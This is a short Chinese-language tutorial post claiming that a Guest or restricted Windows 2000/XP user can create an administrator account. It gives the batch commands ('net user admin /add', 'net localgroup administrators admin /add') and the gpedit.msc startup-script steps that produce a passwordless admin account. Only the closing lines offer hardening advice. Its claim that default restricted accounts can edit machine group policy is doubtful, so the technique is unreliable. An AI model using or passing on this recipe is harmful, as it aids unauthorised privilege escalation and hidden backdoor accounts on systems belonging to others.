大家知道,在Windows 2000/XP 中,如果你是管理員,就算不知道其他用戶(管理員)的密碼,還是可以用 Net User 帳戶 密碼 更改其密碼。據(jù)說MS是為了用戶的方便(如用戶忘記密碼),此外,用戶還可以用Net Localgroup Administrators帳戶 /add 命令來將帳戶添加到管理員組。
但是,如果你不是管理員,如Guest帳戶,表面上是不可以使用上述命令的,但我們可以通過某種渠道來使用它。
例:以 Guest帳戶身份創(chuàng)建一個管理員
一、 創(chuàng)建一個批處理文件,內(nèi)容如下:
net user admin /add
net localgroup administrators admin /add
將上述的批處理文件保存為 admin.bat.
注:上述批處理文件作用是創(chuàng)建一個名為 admin 的管理員帳戶(密碼為空)。
二、將此批處理文件作為Windows 的開機(jī)啟動腳本。
1、在 運(yùn)行 對話框中輸入 gpedit.msc
2、定位到 計(jì)算機(jī)配置一>Windows設(shè)置一>腳本 (啟動/關(guān)機(jī)), 雙擊右邊窗口的 啟動,在其中添加先前創(chuàng)建的 admin.bat。
3、重新啟動計(jì)算機(jī),系統(tǒng)便有了一個名為admin 的管理員
上述操作在Windows 2000/XP中可行,但要保證帳戶可以訪問注冊表,組策略(創(chuàng)建帳戶的操作實(shí)際上也就是在注冊表中添加相應(yīng)的項(xiàng)和值),而Windows中的缺省的Guest/受限帳戶并無此限制。
或許,我們并不需要用Guest帳戶去創(chuàng)建一個管理員,但設(shè)想如果某個程序只有管理員可執(zhí)行,是否也就可用上述的方法來實(shí)現(xiàn)呢?
小結(jié):Windows系統(tǒng)默認(rèn)對Guest/受限帳戶的限制只是表面上的,作為一個有經(jīng)驗(yàn)的系統(tǒng)管理員,要做的事情還很多,起碼應(yīng)該禁止受限用戶訪問/修改注冊表,組策略等。